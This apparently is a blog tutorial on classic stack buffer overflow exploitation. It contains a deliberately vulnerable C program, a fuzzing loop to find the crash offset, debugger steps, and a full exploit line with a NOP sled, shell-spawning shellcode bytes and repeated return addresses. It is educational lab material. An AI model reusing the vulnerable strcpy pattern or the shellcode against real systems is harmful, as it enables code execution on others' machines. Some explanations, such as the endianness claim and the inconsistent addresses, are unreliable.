Buffer overflow exploit development

Buffer overflow exploits leverage a special type of bug in software where the buffer to be read or written is not properly managed. Normally an input data larger than the size of the buffer must lead to a fault or crash. However the Art of exploit development is to create a crafted data that not only does it not cause a program crash but also leads to an arbitrary command execution. Although a hacking experience such the one you had in my  Remote Hacking with Metasploit article proves how devastating can a buffer overflow exploit be, you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorial and even books out there teaching the basic concepts of buffer overflow exploits. A good example is this presentation regarding basic concepts of buffer overflow from syssec. I strongly recommend reading this power point presentation first and then read the rest of this exploit development tutorial. Here I am assuming that you have read this or you have a basic understanding of what buffer overflow is and why it can lead to an arbitrary code execution.

Which programming languages should I know for exploit development?

Generally for identifying a vast portion of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, especially you should be comfortable by the pointer concept. Rather than C, a deep knowledge of assembly is also required. Assembly knowledge also is required for Shellcode development (don’t worry you get what shellcode is at the end of this article). The exploit writing itself does not need any programming language although developing exploit with metasploit is strongly recommended. Eventually a scripting language such as Python or Perl can buy you a lot of time for fuzzing to detect the buffer overflow vulnerability and then to write a code snippet to automatically run the exploit.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C but here I give you a basic example of an unmanaged buffer which can lead to a buffer overflow exploit:

 int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The Art of Exploitation - overflow_example.c

Here the buffer_two is 8 bytes but no size checking is performed before copying the arg1 to it. This means you can input 16 or even more bytes to cause a buffer overflow. If you compile and run this small code you see the effect of a buffer flow. In this case the buffer_one is overwritten by extra bytes. Surprise?! Don’t be, if you had read the basic concepts behind buffer overflow you know that the stack grows down and this means any subsequent variables (in this case buffer_two) in memory are saved before their precedent (buffer_one). If you input a larger string you see that the program crashes. Usually you get a segmentation fault error because of the overflow. The goal of exploit development (for buffer overflow specifically) is to leverage this bug and recieve a shell or command prompt instead of a segmentation fault error or program crash! How fun it will be, right? Be patient we will get to that point. But first let’s review the requirements for exploit development.

Exploit experimentation operating system requirement

10 years ago, exploit writing was much easier than what it is right now. That’s because that time most of the current protections and security mechanisms to prevent a buffer overflow did not exist. If you’re thirsty to know how a simple vulnerable code can be exploited on modern operating systems such as Win 7 or Windows 8 you must be patient and read the articles in the Exploitation category especially Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept download an old OS such as Ubunto 7.04 (Fiesty Fawn) that has little to no protection mechanisms. On such operating systems you can see the feasibility of exploitation and learn the basic exploit development concepts and then gradually upgrade your knowledge to hack on modern operating systems.

Why Buffer overflows can lead to an arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions and depending on the algorithm of the program, the Main function executes other functions. “Main” function is the entry point of an application and when you click an executable, the statements in the Main function are executed one by one. A statement can be a call to a function and the called function can call another function in itself. This function calling mechanism has no limit so how does operating system keep track of the instructions to execute?! I mean after a function execution is done how operating system should know what is the next instruction after the called function? Well, a fast method for operating system to keep such data is to keep the next instruction address exactly where it stores the variables and function’s parameters. That place is the stack and again to see its structure I recommend read this presentation. The “next instruction address” after execution of a function is stored on top of all the function variables. This means any buffer vulnerable to buffer overflow in a function is beneath the saved Extended Instruction Pointer (EIP). In other words an overflow on any variable in a function can potentially overwrite the next instruction address or saved EIP on the stack.

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example you see that extending the input finally leads to the program crash. When the crash happens, you have overwritten the EIP. But for a successful exploitation you need to know exactly how many bytes are needed to overwrite the EIP. Well I introduce two methods here. First using a debugger and second by experimentation.

Finding the exact bytes to overwrite the EIP using debugger

In this method we know the value of EIP and we just want to see how far it is located from our buffer. Let’s modify the buffer overflow example a little bit:

#include <stdio.h>

#include <string.h>

void copy_buffer(char buffer[],char argv[]) {

                strcpy(buffer, argv);

}

 

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The only difference is that we used copy_buffer function to copy the program arguments. Here we know that the next instruction after the copy_buffer is line 41. So after this function, the execution flow should return to the address of this instruction. By setting a breakpoint on copy_buffer line in Main and examining its address we are able to locate it in copy_buffer function. The simplest method is to set another breakpoint on line 9 just before  copy_buffer function returns. Then we examine the stack (64 bytes or more) and see where the return address value and our input placed. That’s it the distance between these two addresses show the exact required bytes to overwrite the saved EIP.

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate the task of running the program with different length inputs and see when it crashes. A python script can easily do such a task but here I show you a linux BASH script to do so:

 

$ for i in $(seq 1 100)

> do

> echo Trying offset $i

> ./a.out $(perl –e “print ‘AAAA’x$i“)

> done

 

Whenever you see the first segmentation fault you find the exact offset.

After finding the exact offset by repeating AAAA offset times you can successfully overwrite the EIP by the 0x41414141 value.

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the EIP by a custom valid address means redirecting the execution to a code you want. Immediately you may ask redirecting execution where? You’re writing to a buffer, remember? So not just you’re overflowing the buffer to overwrite the saved EIP on the stack but also you write your code to that buffer. Thus the only barrier is to find the address of that buffer you overwrite so that you will be able to write this address on the saved EIP and bam, the program executes the code as input! This code is known as SHELLCODE.

What is NOP slide?

Finding the address of the buffer where you inject the SHELLCODE is not that easy. There are a lot of factors involved that can change the address of the buffer in different situations. Moreover the address should exactly points to the beginning of the SHELLCODE. So if any factor changes the address even by one byte, the SHELLCODE is not executed completely and the program crashes. To minimize the complexity of finding the exact return address (the address of the buffer) we place NOP instructions at the beginning of the SHELLCODE. When CPU sees a NOP instruction it simple does nothing. Thus if any factors change, the address points to somewhere between the NOP instructions (known as NOP slide) and the CPU executes NOPs one after the other until it reaches the SHELLCODE. The layout of our exploit is as shown in Figure 1:

layout of a buffer overflow exploit

Figure 1

 How to find the return address that points to the SHELLCODE?

The quick answer is using a debugger to find the address of the buffer that holds the input. When you audit an open source code or a simple example like the one in this tutorial you can easily find the address by using the variable name in the debugger.

  1. In Linux, gdb is the best and this task is as easy as attaching to the process:
gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

 

  1. Process Id can be retrieved using ps command and the output file is whatever name you give while compiling with gcc. After attaching to the process you can get the address of the buffer using this command:
x/x [VARIABLE-NAME]

 

In windows, it is even easier using WinDbg or Immunity debugger:

  1. You must first place your .pdb file in a location and point to it using this menu:

File-->Symbol File path

  1. And then you attach to the process using this menu:

File-->Attach to process

  1. And then view the variable address using:

View-->Watch

  1. Here you type the name of your variable.

If you do not have the symbol file and the source code, don’t worry! You can search for the input and retrieve the address of the beginning of the buffer. For example in WinDbg with Mona.py installed finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

SHELLCODE

Figure 2

These bytes if executed will spawn a bash shell for you. But in order to be executed you should inject them by the preceding NOP sled to the program. One important factor for a successful exploitation is the vulnerable buffer length. You can overflow and overwrite the EIP even with a 8 bytes buffer such as the one in our buffer overflow example though it needs a lot of experience and knowledge. We want to input our SHELLCODE + NOP Sled to the buffer so our buffer should be at least that big. Because of this we modify our buffer overflow example like this:

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[250];

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

}

 

Now our vulnerable buffer is big enough that we can input a data that contains our NOP sled + SHELLCODE + Repeated Return Address

Building the exploit

Ok, so far you saw a vulnerable program to buffer overflow exploit. Then you learned that any vulnerable buffer allows you to overwrite the return address on the stack. Afterward you learned that you can purposely overwrite the return address so that it points to a SHELLCODE you input to the buffer. Finally you’ve learned how to find the address of the SHELLCODE at the buffer and add some NOPs to increase precision. Now it is time to see how we build an exploit using this info.

  1. In Linux we build the NOP sled like this:
$(perl -e 'print "\x90"x200')

 

This builds 200 NOP consecutive instructions for us.

  1. Then we build our SHELLCODE like this:
 Export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80")

 

The string is hexadecimal representation of binary codes to spawn a bash shell for us.

  1. Finally assuming the address of vulnerable buffer is 0xbffff5c0, we repeat the address of 0xbffff624 10 times. That’s right we do not repeat the buffer address but we repeat 0xbffff5c0 + 100! Because 100 bytes after it we are in the middle of NOP instructions and it is a safe guess even if the buffer address is altered by a factor. Why 10 times? That depends to the buffer length (here 250), NOP Sled size and the offset of the buffer to the saved EIP. Remember that the goal is to overflow the buffer and overwrite the EIP so if 10 does not work for you once again you can run the BASH script to find the offset and calculate the length of Repeated Return Addresses:
$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Did you notice? The address is in reverse order! That’s because an Intel 32 bit architecture like the Ubunto 7.04 (Fiesty Fawn) is little endian and this means the least significant bit is placed at the higher address.

  1. Finally our exploit can be run:
./a.out $(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Or the exploit can be saved in a local environment variable like this:

Export EXPLOIT=$(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

You can also save the exploit to a file:

Echo $EXPLOIT > example_exploit

 

 Or you can run the exploit in future by:

./a.out $(echo $EXPLOIT)

 

Or:

./a.out $(cat example_exploit)

 

 

Read 1078 times Last modified on Saturday, 01 August 2015 17:37
Rate this item
0
(0 votes)
About Author
Leave a comment

Make sure you enter the (*) required information where indicated. HTML code is not allowed.

Advanced Programming Concepts
News Letter

Subscribe our Email News Letter to get Instant Update at anytime